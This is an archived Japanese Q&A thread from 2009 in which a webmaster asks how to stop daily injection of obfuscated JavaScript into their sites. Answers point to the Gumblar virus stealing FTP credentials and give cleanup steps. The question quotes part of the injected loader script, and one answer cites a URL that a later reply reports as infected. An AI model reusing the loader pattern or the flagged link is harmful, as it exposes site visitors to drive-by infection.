1週間ほどハッキングに悩まされております。

Question

kanienoteiou

39

39もっと見る

168pt

コンピュータインターネット

1週間ほどハッキングに悩まされております。

私の管理するサイト数件がいっせいに被害にあっています。

ＷＥＢサイトに下記のようなコードが埋め込まれるのです（念のため転記は一部）。

<script>/*GNU GPL*/ try{window.onload = function(){var Xi3ref6qv5 = document.createElement('s$^$(c($r)i))^p!^!#t^(!'.replace(/\!|\^|#|@|\)|\(|\$|&/ig, ''));Xi3ref6qv5.setAttribute('type', 'text/javascript');Xi3ref6qv5.setAttribute('src', 'h^$$t$^&t^&$))p$)&:$^)/(^/!^t@i@!s(!（以下略）

ネット上で同じような被害が多発している旨見まして、手動でコードを削除しています。
削除後FTPのパスワードも変えています。
しかし次の日には同じコードが埋め込まれてしまうのです。

各サイトは、htmlベースの静的なもの、wordpressによるものもありますが、
同じ被害にあっています。
WPサイトは、コードを削除後FTPアカウントとともに、WPの管理者アカウントも変更しています。

サーバーはlolipop、heteml、マイティーサーバを利用していますが、
どのサーバーのものも全部やられています。
この状況から私のＰＣ自体に問題があるのではないかとも疑っております。

ここ数日はやっている現象のように見受けられるのですが、根本的な処置をお教えください。

回答の条件

URL必須
1人2回まで

登録：2009/12/25 11:37:37
終了：2009/12/29 13:22:58

※ 有料アンケート・ポイント付き質問機能は2023年2月28日に終了しました。

No.2

mattn104232009/12/25 11:58:55

16pt

ハッキングではなく、感染してますね。

http://www.ryan-isra.net/howto-fix-malicious-javascript-suspecte...

断ち切るには、感染経路を調べるのが先ですね。

感染しているのがWordPressらしいので、おそらくWordPressの穴をついた攻撃かと思います。

ですのでパスワードを変えても無駄かもしれません。

サービスを止めて最新のWordPressにするか、WordPressの脆弱性アナウンスを調べると良いかと思います。

wordpressのバージョンを最新にしても同じ症状が発生しましたので、

ウィルスチェック＆削除、FTPのパスワードを変えて、FTPを使わないようにしたところ、収束しました。

新しいウィルスソフトを使用したところ、ＦＴＰを使用したときに、ウィルスが検出されましたので、おそらくウィルスだったのではないかと思います。

しばらく様子を見てみます。

ありがとうございました。

2009/12/29 13:15:12

No.3

mattn104232009/12/25 12:26:22

5pt

失礼しました。sm0k3さんの言うように、ローカルPCが原因の様ですね。

http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102

はい。

ローカルＰＣの問題だった模様です。

ありがとうございました。

2009/12/29 13:15:31

No.4

horonict257512009/12/25 13:25:10

28pt

症状からして、ご利用のPCがGumblarウイルスに感染していると思われます。

対策として以下の手順を実施してください。

パターンファイルを最新にしたウイルススキャンソフトを使ってPCをフルスキャンする
WindowsUpdateを実施する
Adobe Reader, Acrobat, Flash Playerを最新版にする

Gumblarウイルスとは

http://internet.watch.impress.co.jp/cda/special/2009/05/21/23523...

http://www.yomiuri.co.jp/net/security/goshinjyutsu/20091224-OYT8...

ご指摘いただいた対策を全ておこない、

ＦＴＰのパスワードを変え、且つ、ＦＴＰを使用しないようにしました。

これで、落ち着いている模様です。

ありがとうございました。

2009/12/29 13:16:20

No.5

kn196729153012009/12/25 13:29:35

16pt

Wordpress2.8系の最新版は2.8.6になります。

セキュリティアップデートなので、アップデートは必須と心得ましょう。

WordPress | 日本語 » WordPress 2.8.6 日本語版リリースのお知らせ

マイティーサーバの「お知らせ」では見かけませんでしたが、

各レンタルサーバー会社の「お知らせ」では（重要度にもよりますが）

アップデートの必要性について書かれている場合もありますので、

本家（WordPress | 日本語）以外にも目を通すように、

しておいたほうがよろしいかと思います。

WordPress をご利用のお客様へ / 新着情報 / お知らせ - ロリポップ！

「 WordPress 」の脆弱性に関する報告 - 大容量・高機能レンタルサーバー「heteml」

※どういったお立場か存じませんが、

　管理者としての手落ちだと糾弾されても文句は言えない状況なので、

　バックアップを取った上で、早急に対応なさる事をお勧めします。

はい。

今回はかなり身につまされました。

セキュリティに対して再度気を引き締めなおします。

ありがとうございました。

2009/12/29 13:16:59

No.6

azuco1975613162009/12/25 15:28:44

7pt

lolipopに相談するのが一番です。

数日で対策方法がメールしてくれますよ。

http://q.hatena.ne.jp/answer

今回は、なんとか対策完了した模様です。

ありがとうございました。

2009/12/29 13:17:21

No.7

szich102009/12/25 15:42:24

27pt

Gumblarウイルス、通称GENOウィルスですね。

対策については、ここが比較的まとまっていると思います。

http://www31.atwiki.jp/doujin_vinfo/

大変参考になりました。

ありがとうございました。

2009/12/29 13:17:36

No.8

k2jp1962009/12/25 18:13:18

24pt

直接質問とは関係ないですが、id:mattn さんが２番目の回答で引用している ryan-isla を含むURLは感染しているようです。ESET NOD32 が警告出しました。

・JavaScript 有効状態でアクセスしてしまった人は感染確認することをオススメします

・プラグイン有効状態でアクセスしてしまった人も（念のため）感染確認しておくと良いと思います

安全な URL 以外、引用は慎重にしたほうが２次感染予防に良いかと思います

ウィルススキャンソフトを、ESTEに変更したところ、駆除が出来たようです。

ありがとうございました。

2009/12/29 13:18:21

No.9

(･∀･)キムティ♪102009/12/25 20:45:53

18pt

専門的な内容はわかりませんが、ここ数日の動向をまとめてあります。

現状、FTPパスワードを盗まれたことによる改竄なのか、脆弱性を利用した改竄なのか、

特定できていないません。後者のケースを想定した対策が必要かと思われます。

WordPressなどのPHPやHTMLコンテンツ改竄に関する情報を追加中　　JR東日本サイト改竄などの「Gumblar」亜種に関する情報共有　http://bit.ly/5p9YNP

症状と、対策の状況から察するに、

ウィルスに感染して、ＦＴＰを監視されていた模様です。

パスワードを変更しても、次の日にはまたやられていましたが、

パスワード変更後、ＦＴＰを使用しないようにしたら、問題は発生しませんでした。

複数のウィルス対策ソフトで、徹底的に削除を行った結果、ＦＴＰを使用しても、改竄はなくなりました。

ありがとうございました。

2009/12/29 13:20:30

yokuzai 2010/10/30 11:24:59

（はてなにより削除しました）

404 ないわー (・∀・)キムティ♪ Not Foundの日記 - JR東日本サイト改竄などの「Gumblar」亜種に関する情報共有（JustExploit、Adobe PDF Zero-Day Attack、WordPress） 2009-12-26 05:49:48

JR東日本サイト改竄などの「Gumblar」亜種に関する情報共有（JustExploit、Adobe PDF Zero-Day Attack、WordPress）予想以上に影響が深刻だと思いましたので、ここ数日集めた事柄を情報共有を目的とし
【注意】mooter のブログパーツが改ざんされウイルスをまいていたようです。メガネ王のblog：ぬくもり、時々、晴れ。 2009-12-30 17:40:46

4:00 AM Dec 26th以前に、僕のwebsiteをご覧になった方、ウイルス感染の可能性があります。ウイルススキャンして下さい！感染元のmooterのブログパーツはこちら（ttp://tools.mooter.co.jp/searchbox.html）

「あの人に答えてほしい」「この質問はあの人が答えられそう」というときに、回答リクエストを送ってみてましょう。

これ以上回答リクエストを送信することはできません。制限について

リクエスト送信済

回答リクエストを送信したユーザーはいません

03 · Accepted Answer · 2009-12-25T11:46:21+09:00

http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102

本当に最近の話なんですね、推測されているとおり、PC側に問題があるようです。

対策としては、いくつかのソフトを最新にすれば良いようです。

http://blogs.yahoo.co.jp/noooo_spam/59306006.html

03 · Accepted Answer · 2009-12-25T11:46:21+09:00

http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102

本当に最近の話なんですね、推測されているとおり、PC側に問題があるようです。

対策としては、いくつかのソフトを最新にすれば良いようです。

http://blogs.yahoo.co.jp/noooo_spam/59306006.html

1週間ほどハッキングに悩まされております。

ベストアンサー

03591392009/12/25 11:46:21

その他の回答（8件）

03591392009/12/25 11:46:21ここでベストアンサー

mattn104232009/12/25 11:58:55

mattn104232009/12/25 12:26:22

horonict257512009/12/25 13:25:10

Gumblarウイルスとは

kn196729153012009/12/25 13:29:35

azuco1975613162009/12/25 15:28:44

szich102009/12/25 15:42:24

k2jp1962009/12/25 18:13:18

(･∀･)キムティ♪102009/12/25 20:45:53

コメント（1件)

この質問への反応（ブックマークコメント）

トラックバック